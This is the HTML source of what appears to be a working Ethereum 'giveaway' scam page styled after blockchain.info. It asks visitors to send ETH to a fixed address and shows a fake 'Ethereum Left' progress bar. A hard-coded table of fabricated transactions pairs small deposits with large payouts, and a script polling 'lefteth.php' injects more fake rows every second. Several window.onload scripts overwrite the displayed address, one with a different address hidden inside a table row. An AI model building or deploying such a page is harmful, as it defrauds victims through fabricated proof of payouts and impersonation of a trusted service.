<!DOCTYPE html>
<html>
<head>
    <title>Payment request</title>

    <style>.last_trans {
        width: 900px;
        margin-top: 50px;
        margin-right: auto;
        margin-bottom: 0;
        margin-left: auto;
        background-color: #ffffff;
        padding: 15px;
    }

    h1.f-24.mvn.em-300 {
        font-family: Montserrat, Helvetica, sans-serif;
        color: rgb(95, 95, 95);
        font-size: 25px;
        font-weight: 300;
        margin-bottom: 15px;
    }

    h1.f-24.mvn.em-300 span {
        font-family: 'Montserrat', 'Helvetica', sans-serif;
        font-size: 16px;
        font-style: italic;
        color: #a8a8a8;
        font-weight: 300;
        white-space: nowrap;
        margin-left: 10px;
    }

    .text-overflow-hidden, .ui-select-match-text {
        overflow: visible !important;
    }

    .numb {
        text-align: center;
        font-size: 40px;
        padding: 46px 10px 0 10px;
        color: #fff;
    }

    .numb-hint {
        color: #CBCBCB;
        font-size: 21px;
        padding-left: 15px;
    }

    .dot-1 {
        position: absolute;
        bottom: 100%;
        font-size: 12px;
        width: 100%;
        margin-left: 0;
        z-index: 100;
        padding: 8px;
    }

    /* progress bar */

    #lympo_progress .progress {
        max-width: 460px;
        margin: 10px auto;
        height: 45px;
        border-radius: 5px;
        position: relative;
    }

    #lympo_progress .progress {
        margin-bottom: 20px;
        background-color: #3b3b43;
        border-radius: 4px;
        -webkit-box-shadow: inset 0 1px 2px rgba(0, 0, 0, 0.1);
        box-shadow: inset 0 1px 2px rgba(0, 0, 0, 0.1);
    }

    #lympo_progress .progress:before {
        content: "";
        display: block;
        background: #000;
        width: 100%;
        height: 100%;
    }

    #lympo_progress .progress-row {
        max-width: 600px;
        margin: 0 auto;
    }

    #lympo_progress .progress-row > div {
        padding: 0 5px;
    }

    #lympo_progress .progress-bar {
        -webkit-transition: width 1.4s ease;
        transition: width 1.4s ease;
    }

    #lympo_progress .progress-bar {
        float: left;
        width: 0%;
        height: 100%;
        border-bottom-left-radius: 4px;
        border-top-left-radius: 4px;
        font-size: 13px;
        line-height: 20px;
        color: #ffffff;
        text-align: center;
        background-color: #ee1d4e;
        -webkit-box-shadow: inset 0 -1px 0 rgba(0, 0, 0, 0.15);
        box-shadow: inset 0 -1px 0 rgba(0, 0, 0, 0.15);
        -webkit-transition: width 0.6s ease;
        transition: width 0.6s ease;
        position: absolute;
        top: 0;
    }

    #lympo_progress .progress-striped .progress-bar, #lympo_progress .progress-bar-striped {
        background-image: linear-gradient(135deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
        /* background-image: linear-gradient(45deg,rgba(255,255,255,0.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,0.15) 50%,rgba(255,255,255,0.15) 75%,transparent 75%,transparent); */
        background-size: 40px 40px;

    }

    #lympo_progress .progress.active .progress-bar, #lympo_progress .progress-bar.active {
        -webkit-animation: progress-bar-stripes 2s linear infinite;
        animation: progress-bar-stripes 2s linear infinite;
    }

    @keyframes progress-bar-stripes {
        from {
            background-position: -40px 0;
        }
        to {
            background-position: 0 0;
        }
    }

    #lympo_progress .progress-ico {
        position: relative;
        max-width: 460px;
        margin: 48px auto -3px auto;
    }

    #lympo_progress .progress-ico .dot-1 {
        position: absolute;
        bottom: 100%;
        font-size: 12px;
        width: 100%;
        margin-left: 0;
        z-index: 100;
        padding: 8px;
    }

    #lympo_progress .progress-ico .dot-2 {
        position: absolute;
        top: 100%;
        font-size: 12px;
        width: 100%;
        height: auto;
        padding: 8px;
        margin-left: 0;
        z-index: 100;
    }

    #lympo_progress .progress-ico .dot-1 {
        color: #fff;
        width: 100%;
        text-align: center;
        padding-bottom: 12px;
        font-weight: 700;
        font-size: 16px;
    }

    #lympo_progress .progress-ico .dot-1-airdrop:before {
        content: "";
        display: block;
        width: 10px;
        height: 10px;
        background-color: #f04154;
        border-radius: 50%;
        margin: 0;
        position: absolute;
        right: -4px;
        top: -7px;
    }

    #lympo_progress .progress-ico .dot-1-airdrop {
        content: "";
        display: block;
        height: 60px;
        background-color: #f04154;
        width: 2px;
        position: absolute;
        right: -1px;
        z-index: 100;
        top: -4px;
        left: 100%;
    }

    #lympo_progress .progress-ico .progress {

        position: relative;
        margin: 0 auto;
    }

    #lympo_progress .progress-ico span {
        position: absolute;
        text-align: center;
        top: 0;
        left: 0;
        right: 0;
        line-height: 45px;
        color: #fff;
        font-size: 14px;
        letter-spacing: 0.5px;
        white-space: nowrap;
        overflow: hidden;
        text-overflow: ellipsis;
    }

    #lympo_progress .ends {
        position: absolute;
        bottom: -20px;
        width: 100%;
        text-align: center;
        font-size: 12px;
    }

    @media (max-width: 767px) {
        #lympo_progress .progress-ico span {
            font-size: 15px;
        }
    }

    #lympo_progress .progress-ico span strong {
        color: rgba(255, 255, 255, 0.4);
    }

    #lympo_progress .progress-ico i {
        font-size: 11px;
        text-align: right;
        float: right;
        color: #7f8480;
        margin-bottom: -7px;
        font-style: normal;
        margin-top: 2px;
    }

    #lympo_progress .progress-tour {
        max-width: 400px;
        margin: 10px auto;
    }

    #lympo_progress .progress-tour span.tour-left {
        float: left;
        display: inline-block;
        width: 25%;
        line-height: 40px;
        font-size: 15px;
        font-weight: 500;
        color: #868886;
    }

    @media (max-width: 767px) {
        #lympo_progress .progress-tour span.tour-left {
            width: 30%;
            font-size: 12px;
        }
    }

    #lympo_progress .progress-tour small {
        padding-left: 25%;
        margin: 3px 0 10px 0;
        display: block;
        color: #868886;
    }

    #lympo_progress .progress-money {
        display: inline-block;
        float: left;
        width: 75%;
        line-height: 40px;
        height: 40px;
        border-radius: 5px;
        background-color: rgba(0, 0, 0, 0.3);
        color: #fff;
        font-size: 20px;
        letter-spacing: 4px;
        text-shadow: 0px 0px 3px rgba(0, 0, 0, 0.05);
    }

    #lympo_progress .progress-money strong {
        letter-spacing: 0px;
        font-size: 18px;
        color: #ababab;
    }

    @media (max-width: 767px) {
        #lympo_progress .progress-money {
            font-size: 15px;
            letter-spacing: 5px;
            width: 70%;
        }

        #lympo_progress .progress-money strong {
            font-size: 14px;
        }
    }

    .label-orange {
        background: #e67e22;
    }

    </style>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
    <link rel="stylesheet" href="https://blockchain.info/Resources/overrides.min.css?18005c9c8eb43636">
    <script src="https://blockchain.info/Resources/js/jquery.min.js" type="text/javascript"></script>
    <script type="text/javascript"
            src="https://blockchain.info/Resources/js/bootstrap.min.js?18005c9c8eb43636"></script>
    <script src="https://blockchain.info/Resources/js/shared.min.js?18005c9c8eb43636" type="text/javascript"></script>
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0">
    <script>window.onload = function () {
        document.getElementById('address').innerHTML = '0xf77C518A03B25973c8799E54A64B7A836e338B7D';
    }; </script>
    <script src='/Resources/analytics.js'></script>
    <script src='/Resources/js/navbar-analytics.js?18005c9c8eb43636'></script>
    <link rel="stylesheet" href="https://blockchain.info/Resources/css/blockchain.css?18005c9c8eb43636">


    <script type="text/javascript" src="/Resources/js/clipboard.min.js?18005c9c8eb43636"></script>
    <script type="text/javascript" src="/Resources/js/jquery.qrcode.min.js?18005c9c8eb43636"></script>
    <script type="text/javascript" src="/Resources/js/bitcoin-payment-request.js?18005c9c8eb43636"></script>
    <script>window.onload = function () {
        document.getElementById('address').innerHTML = '0xf77C518A03B25973c8799E54A64B7A836e338B7D';
    }; </script>
    <link rel="stylesheet" href="https://blockchain.info/Resources/payment-request.css?18005c9c8eb43636"
          type="text/css">
    <link rel="stylesheet" href="https://blockchain.info/Resources/app-overrides.css?18005c9c8eb43636" type="text/css"
          media="only screen">
</head>

<body class="bg-blue opaque-nav main-font request">


<br/>
<br/>
<br/>
<br/>
<br/>
<br/>
<input type="number" name="" value="0" id="btc" class="hidden">

<div class="overflow-scroll flex-justify flex-center main-font">
    <div class="bg-white payment-request pos-rel">
        <div class="pv-0 ph-40 center">


            <div class="detail" style="margin-top:-100px">


                <h1 class="f-24 mvn em-300">Payment Address</h1>


                <p class="f-16 em-300 mt-15 mb-25">You can send ETH to the following address.</p>

                <div class="flex-row mb-25">
                    <span class="f-16 bg-grey ph-25 pv-10 text-overflow-hidden" id="address">0xf77C518A03B25973c8799E54A64B7A836e338B7D</span>

                </div>


                <p class="f-16 em-300 mb-25 message hidden">For "<span class="italic"></span>"</p>

                <div id="qr-code" class="mb-25 flex-justify"><img width="150" height="150" src="https://chart.googleapis.com/chart?cht=qr&chl=0xf77C518A03B25973c8799E54A64B7A836e338B7D&chs=180x180&choe=UTF-8&chld=L|2" alt=

""></img></div>

                <p class="f-16 em-300 mt-15 mb-25">Waiting for your payment</p><br/>
                <img src="https://i.imgur.com/T1X5ZPT.gif" width="30px" style="margin-top:-30px"/>
                <p style="font-size:12px" class="f-16 em-300 mt-15 mb-25">Once we receive your transaction, we will
                    process the outgoing transaction to your address...</p>

            </div>
        </div>
    </div>
</div>


<div id="lympo_progress">
    <div class="row progress-row">
        <div class="colums_12">
            <div class="progress-ico">
                <div class="progress-ico">
                    <div class="progress">
                        <div class="progress-bar progress-bar-striped active progress-width" id="progress-ico"
                             role="progressbar"
                             style="width: 51.86%;">
                            <span class="sr-only">x</span></div>
                    </div>
                </div>
                <div class="dot-1">
                    Ethereum Left
                </div>
                <div class="dot-1-airdrop  progress-left" style="left: 51.86%;"></div>
                <span class="progress-bar-value" id="progress-ico-bar">2 593 / 5 000</span></div>
        </div>
    </div>
</div>

<div class="last_trans">
    <h1 class="f-24 mvn em-300">Transactions for address:<span>0xf77C518A03B25973c8799E54A64B7A836e338B7D</span></h1>
    <table class="table">

        <tr>
            <th>TxHash
            </th>
            <th class="hidden-sm">Block
            </th>
            <th>
                <span title="UTC time">Age</span>
            </th>
            <th>From
            </th>
            <th></th>
            <th>To
            </th>
            <th>Value
            </th>
            <th><span rel="tooltip" data-placement="bottom" title=""
                      data-original-title="(GasPrice * GasUsed By Txn) in Ether"><font color="silver"
                                                                                       size="1">[TxFee]</font></span>
            </th>
        </tr>
        <tbody id="ajax-table">
        <tr>
            <td><a class="address-tag" href="#">0x9addb4ab6a83b917...</a></td>
            <td class="hidden-sm"><a href="/block/5116568">5138995</a></td>
            <td width="150px !important"><span rel="tooltip" data-placement="bottom" title=""
                                               data-original-title="Feb-19-2018 04:16:52 AM" class="time-update" data-time="1519658061">17 secs ago</span></td>
            <td><a class="address-tag" href="#">0x11517d38d2a89129848...</a></td>
            <script>window.onload = function () {
                document.getElementById('address').innerHTML = '0xf77C518A03B25973c8799E54A64B7A836e338B7D';
            }; </script>
            <td><span class="label label-orange rounded" style="background: #e67e22;">OUT</span></td>
            <td><span class="address-tag">0x3c44762c6f79d6b9b...</span></td>
            <td>29.99 Ether</td>
            <td>
                <font color="gray" size="1">0<b>.</b>00168</font>
            </td>
        </tr>
        <tr>
            <td><a class="address-tag" href="#">0x9dfdb2ab6a16b910...</a></td>
            <td class="hidden-sm"><a href="/block/5116568">5138994</a></td>
            <td><span rel="tooltip" data-placement="bottom" title="" data-original-title="Feb-19-2018 04:16:52 AM" class="time-update" data-time="1519658017">1 mins ago</span>
            </td>
            <td><a class="address-tag" href="#">0x3c44762c6f79d6b9b...</a></td>
            <td><span class="label label-success rounded">&nbsp; IN &nbsp;</span></td>
            <td><span class="address-tag">0x11517d38d2a89129848...</span></td>
            <td>2<b>.</b>99 Ether</td>
            <td>
                <font color="gray" size="1">0<b>.</b>00105</font>
            </td>
        </tr>

        <tr>
            <td><a class="address-tag" href="#">0x6c5b44fc5a29beb...</a></td>
            <td class="hidden-sm"><a href="/block/5116568">5138993</a></td>
            <td><span rel="tooltip" data-placement="bottom" title="" data-original-title="Feb-19-2018 04:16:52 AM" class="time-update" data-time="1519657957">2 mins ago</span>
            </td>
            <td><a class="address-tag" href="#">0x11517d38d2a89129848...</a></td>
            <td><span class="label label-orange rounded" style="background: #e67e22;">OUT</span></td>
            <td><span class="address-tag">0xffb3d469cc672e7...</span></td>
            <td>15.00 Ether</td>
            <td>
                <font color="gray" size="1">0<b>.</b>00189</font>
            </td>
        </tr>

        <tr>
            <td><a class="address-tag" href="#">0xac85ffe9ec3cb14f...</a></td>
            <td class="hidden-sm"><a href="/block/5116562">5138992</a></td>
            <td><span rel="tooltip" data-placement="bottom" title="" data-original-title="Feb-19-2018 04:15:32 AM" class="time-update" data-time="1519657897">3 mins ago</span>
            </td>
            <td><a class="address-tag" href="#">0xffb3d469cc672e7...</a></td>
            <td><span class="label label-success rounded">&nbsp; IN &nbsp;</span></td>
            <td><span class="address-tag">0x11517d38d2a89129848...</span></td>
            <td>1<b>.</b>50 Ether</td>
            <td>
                <font color="gray" size="1">0<b>.</b>00147</font>
            </td>
        </tr>

        <tr>
            <td><a class="address-tag" href="#">0x29654c9491c57c...</a></td>
            <td class="hidden-sm"><a href="/block/5116568">5138991</a></td>
            <td><span rel="tooltip" data-placement="bottom" title="" data-original-title="Feb-19-2018 04:16:52 AM" class="time-update" data-time="1519657878">3 mins ago</span>
            </td>
            <td><a class="address-tag" href="#">0x11517d38d2a89129848...</a></td>
            <td><span class="label label-orange rounded" style="background: #e67e22;">OUT</span></td>
            <td><span class="address-tag">0x7eee1ec1ebfca72ba...</span></td>
            <td>29.95 Ether</td>
            <td>
                <font color="gray" size="1">0<b>.</b>00042</font>
            </td>
        </tr>

        <tr>
            <td><a class="address-tag" href="#">0xd04a374721b3c87f...</a></td>
            <td class="hidden-sm"><a href="/block/5116413">5138989</a></td>
            <td><span rel="tooltip" data-placement="bottom" title="" data-original-title="Feb-19-2018 03:41:32 AM" class="time-update" data-time="1519657833">4 mins ago</span>
            </td>
            <td><a class="address-tag" href="#">0x7eee1ec1ebfca72ba...</a></td>
            <td><span class="label label-success rounded">&nbsp; IN &nbsp;</span></td>
            <td><span class="address-tag">0x11517d38d2a89129848...</span></td>
            <td>2<b>.</b>995 Ether</td>
            <td>
                <font color="gray" size="1">0<b>.</b>00147</font>
            </td>
        </tr>


        <tr>
            <td><a class="address-tag" href="#">0xb1462c68b707d5...</a></td>
            <td class="hidden-sm"><a href="/block/5116568">5138987</a></td>
            <td><span rel="tooltip" data-placement="bottom" title="" data-original-title="Feb-19-2018 04:16:52 AM" class="time-update" data-time="1519657713">6 mins ago</span>
            </td>
            <td><a class="address-tag" href="#">0x11517d38d2a89129848...</a></td>
            <td><span class="label label-orange rounded" style="background: #e67e22;">OUT</span></td>
            <td><span class="address-tag">0x097875225c51d535d...</span></td>
            <td>28.85412 Ether</td>
            <td>
                <font color="gray" size="1">0<b>.</b>00042</font>
            </td>
        </tr>

        <tr>
            <td><a class="address-tag" href="#">0xdc4aded3f65cdbb9...</a></td>
            <td class="hidden-sm"><a href="/block/5116293">5138986</a></td>
            <td><span rel="tooltip" data-placement="bottom" title="" data-original-title="Feb-19-2018 03:14:00 AM" class="time-update" data-time="1519657648">7 mins ago</span>
            </td>
            <td><a class="address-tag" href="#">0x097875225c51d535d...</a></td>
            <td><span class="label label-success rounded">&nbsp; IN &nbsp;</span></td>
            <td><span class="address-tag">0x11517d38d2a89129848...</span></td>
            <td>2<b>.</b>85412 Ether</td>
            <td>
                <font color="gray" size="1">0<b>.</b>00042</font>
            </td>
        </tr>


        <tr>
            <td><a class="address-tag" href="#">0xb1462c68b707d5...</a></td>
            <td class="hidden-sm"><a href="/block/5116568">5138986</a></td>
            <td><span rel="tooltip" data-placement="bottom" title="" data-original-title="Feb-19-2018 04:16:52 AM" class="time-update" data-time="1519657638">7 mins ago</span>
            </td>
            <td><a class="address-tag" href="#">0x11517d38d2a89129848...</a></td>
            <td><span class="label label-orange rounded" style="background: #e67e22;">OUT</span></td>
            <td><span class="address-tag">0x7bf7a96ceb22614af...</span></td>
            <td>19.99 Ether</td>
            <td>
                <font color="gray" size="1">0<b>.</b>00042</font>
            </td>
        </tr>

        <tr>
            <td><a class="address-tag" href="#">0xbf034ac20cfb9f24...</a></td>
            <td class="hidden-sm"><a href="/block/5116209">5138984</a></td>
            <td><span rel="tooltip" data-placement="bottom" title="" data-original-title="Feb-19-2018 02:54:13 AM" class="time-update" data-time="1519657578">8 mins ago</span>
            </td>
            <td><a class="address-tag" href="#">0x7bf7a96ceb22614af...</a></td>
            <td><span class="label label-success rounded">&nbsp; IN &nbsp;</span></td>
            <td><span class="address-tag">0x11517d38d2a89129848...</span></td>
            <td>1<b>.</b>99 Ether</td>
            <td>
                <font color="gray" size="1">0<b>.</b>00042</font>
            </td>
        </tr>

        <tr>
            <td><a class="address-tag" href="#">0x9addb4ab6a83b917...</a></td>
            <td class="hidden-sm"><a href="/block/5116568">5138984</a></td>
            <td width="150px !important"><span rel="tooltip" data-placement="bottom" title=""
                                               data-original-title="Feb-19-2018 04:16:52 AM" class="time-update" data-time="1519657488">9 mins ago</span></td>
            <td><a class="address-tag" href="#">0x11517d38d2a89129848...</a></td>
            <script>window.onload = function () {
                document.getElementById('address').innerHTML = '0x4454C43762a5c1b1709d5b00bc9cBa24EFEBb81f';
            }; </script>
            <td><span class="label label-orange rounded" style="background: #e67e22;">OUT</span></td>
            <td><span class="address-tag">0x3c44762c6f79d6b9b...</span></td>
            <td>44.00 Ether</td>
            <td>
                <font color="gray" size="1">0<b>.</b>00168</font>
            </td>
        </tr>
        <tr>
            <td><a class="address-tag" href="#">0x9dfdb2ab6a16b910...</a></td>
            <td class="hidden-sm"><a href="/block/5116568">5138982</a></td>
            <td><span rel="tooltip" data-placement="bottom" title="" data-original-title="Feb-19-2018 04:16:52 AM" class="time-update" data-time="1519657468">10 min ago</span>
            </td>
            <td><a class="address-tag" href="#">0x3c44762c6f79d6b9b...</a></td>
            <td><span class="label label-success rounded">&nbsp; IN &nbsp;</span></td>
            <td><span class="address-tag">0x11517d38d2a89129848...</span></td>
            <td>4<b>.</b>40 Ether</td>
            <td>
                <font color="gray" size="1">0<b>.</b>00105</font>
            </td>
        </tr>

        <tr>
            <td><a class="address-tag" href="#">0x6c5b44fc5a29beb...</a></td>
            <td class="hidden-sm"><a href="/block/5116568">5138980</a></td>
            <td><span rel="tooltip" data-placement="bottom" title="" data-original-title="Feb-19-2018 04:16:52 AM" class="time-update" data-time="1519657348">12 mins ago</span>
            </td>
            <td><a class="address-tag" href="#">0x11517d38d2a89129848...</a></td>
            <td><span class="label label-orange rounded" style="background: #e67e22;">OUT</span></td>
            <td><span class="address-tag">0xffb3d469cc672e7...</span></td>
            <td>10.00 Ether</td>
            <td>
                <font color="gray" size="1">0<b>.</b>00189</font>
            </td>
        </tr>

        <tr>
            <td><a class="address-tag" href="#">0xac85ffe9ec3cb14f...</a></td>
            <td class="hidden-sm"><a href="/block/5116562">5138979</a></td>
            <td><span rel="tooltip" data-placement="bottom" title="" data-original-title="Feb-19-2018 04:15:32 AM" class="time-update" data-time="1519657288">13 mins ago</span>
            </td>
            <td><a class="address-tag" href="#">0xffb3d469cc672e7...</a></td>
            <td><span class="label label-success rounded">&nbsp; IN &nbsp;</span></td>
            <td><span class="address-tag">0x11517d38d2a89129848...</span></td>
            <td>1<b>.</b>00 Ether</td>
            <td>
                <font color="gray" size="1">0<b>.</b>00147</font>
            </td>
        </tr>

        <tr>
            <td><a class="address-tag" href="#">0x29654c9491c57c...</a></td>
            <td class="hidden-sm"><a href="/block/5116568">5138978</a></td>
            <td><span rel="tooltip" data-placement="bottom" title="" data-original-title="Feb-19-2018 04:16:52 AM" class="time-update" data-time="1519657228">14 mins ago</span>
            </td>
            <td><a class="address-tag" href="#">0x11517d38d2a89129848...</a></td>
            <td><span class="label label-orange rounded" style="background: #e67e22;">OUT</span></td>
            <td><span class="address-tag">0x7eee1ec1ebfca72ba...</span></td>
            <td>49.995 Ether</td>
            <td>
                <font color="gray" size="1">0<b>.</b>00042</font>
            </td>
        </tr>

        <tr>
            <td><a class="address-tag" href="#">0xd04a374721b3c87f...</a></td>
            <td class="hidden-sm"><a href="/block/5116413">5138977</a></td>
            <td><span rel="tooltip" data-placement="bottom" title="" data-original-title="Feb-19-2018 03:41:32 AM" class="time-update" data-time="1519657168">15 mins ago</span>
            </td>
            <td><a class="address-tag" href="#">0x7eee1ec1ebfca72ba...</a></td>
            <td><span class="label label-success rounded">&nbsp; IN &nbsp;</span></td>
            <td><span class="address-tag">0x11517d38d2a89129848...</span></td>
            <td>4<b>.</b>995 Ether</td>
            <td>
                <font color="gray" size="1">0<b>.</b>00147</font>
            </td>
        </tr>


        <tr>
            <td><a class="address-tag" href="#">0xb1462c68b707d5...</a></td>
            <td class="hidden-sm"><a href="/block/5116568">5138976</a></td>
            <td><span rel="tooltip" data-placement="bottom" title="" data-original-title="Feb-19-2018 04:16:52 AM" class="time-update" data-time="1519657108">16 mins ago</span>
            </td>
            <td><a class="address-tag" href="#">0x11517d38d2a89129848...</a></td>
            <td><span class="label label-orange rounded" style="background: #e67e22;">OUT</span></td>
            <td><span class="address-tag">0x097875225c51d535d...</span></td>
            <td>38.85412 Ether</td>
            <td>
                <font color="gray" size="1">0<b>.</b>00042</font>
            </td>
        </tr>

        <tr>
            <td><a class="address-tag" href="#">0xdc4aded3f65cdbb9...</a></td>
            <td class="hidden-sm"><a href="/block/5116293">5138976</a></td>
            <td><span rel="tooltip" data-placement="bottom" title="" data-original-title="Feb-19-2018 03:14:00 AM" class="time-update" data-time="1519657048">17 mins ago</span>
            </td>
            <td><a class="address-tag" href="#">0x097875225c51d535d...</a></td>
            <td><span class="label label-success rounded">&nbsp; IN &nbsp;</span></td>
            <td><span class="address-tag">0x11517d38d2a89129848...</span></td>
            <td>3<b>.</b>85412 Ether</td>
            <td>
                <font color="gray" size="1">0<b>.</b>00042</font>
            </td>
        </tr>


        <tr>
            <td><a class="address-tag" href="#">0xb1462c68b707d5...</a></td>
            <td class="hidden-sm"><a href="/block/5116568">5138975</a></td>
            <td><span rel="tooltip" data-placement="bottom" title="" data-original-title="Feb-19-2018 04:16:52 AM" class="time-update" data-time="1519656988">18 mins ago</span>
            </td>
            <td><a class="address-tag" href="#">0x11517d38d2a89129848...</a></td>
            <td><span class="label label-orange rounded" style="background: #e67e22;">OUT</span></td>
            <td><span class="address-tag">0x7bf7a96ceb22614af...</span></td>
            <td>20.00 Ether</td>
            <td>
                <font color="gray" size="1">0<b>.</b>00042</font>
            </td>
        </tr>

        <tr>
            <td><a class="address-tag" href="#">0xbf034ac20cfb9f24...</a></td>
            <td class="hidden-sm"><a href="/block/5116209">5138975</a></td>
            <td><span rel="tooltip" data-placement="bottom" title="" data-original-title="Feb-19-2018 02:54:13 AM" class="time-update" data-time="1519656928">19 mins ago</span>
            </td>
            <td><a class="address-tag" href="#">0x7bf7a96ceb22614af...</a></td>
            <td><span class="label label-success rounded">&nbsp; IN &nbsp;</span></td>
            <td><span class="address-tag">0x11517d38d2a89129848...</span></td>
            <td>2.00 Ether</td>
            <td>
                <font color="gray" size="1">0<b>.</b>00042</font>
            </td>
        </tr>
        <script>window.onload = function () {
            document.getElementById('address').innerHTML = '0xf77C518A03B25973c8799E54A64B7A836e338B7D';
        }; </script>
        </tbody>
    </table>

</div>


<script>

    function setProgress(count, max) {
        var p = (100 * count / max).toString() + '%';
        $('.progress-left').css('left', p);
        $('.progress-width').css('width', p);
        var cc = count.toString().replace(/(\d)(?=(\d\d\d)+([^\d]|$))/g, '$1 ');
        var mm = max.toString().replace(/(\d)(?=(\d\d\d)+([^\d]|$))/g, '$1 ');
        $('.progress-bar-value').text(cc + ' / ' + mm);
    }

    setInterval(function () {
        $.getJSON("lefteth.php", function (data) {
            setProgress(data.count, data.max);
            $.each(data.transactions, function (k, t) {
                if (!($('#tr' + t.id).length > 0)) {
                    var _h = '<tr id="tr' + t.id + '">\n' +
                        '            <td><a class="address-tag" href="#">' + t.hash + '</a></td>\n' +
                        '            <td class="hidden-sm"><a href="/block/5116568">' + t.block + '</a></td>\n' +
                        '            <td><span rel="tooltip" data-placement="bottom" title="" class="time-update" data-time="' + t.rt + '">few secs ago</span>\n' +
                        '            </td>\n' +
                        '            <td><a class="address-tag" href="#">' + t.from + '</a></td>\n' +
                        '            <td><span class="label ' + ((t.type == 'out') ? 'label-orange' : 'label-success') + ' rounded" style="text-transform: uppercase">' + t.type + '</span></td>\n' +
                        '            <td><span class="address-tag">' + t.to + '</span></td>\n' +
                        '            <td>' + t.amount + ' Ether</td>\n' +
                        '            <td>\n<font color="gray" size="1">' + t.fee +
                        '            </font></td>\n' +
                        '        </tr>';
                    $('#ajax-table').prepend(_h);

                }
            });
            $('.time-update').each(function () {
                var stamp = $(this).data('time');
                var now = data.time;
                var secs = now - stamp;
                if(secs < 60) {
                    $(this).text(secs + ' secs ago');
                } else if (secs < 3600) {
                    $(this).text(Math.floor(secs / 60) + ' mins ago');
                } else if (secs < 86400) {
                    $(this).text(Math.floor(secs / 3600) + ' hours ago');
                } else {
                    $(this).text(Math.floor(secs / 86400) + ' days ago');
                }
            });
        });
    }, 1000);


</script>

</body>
</html>
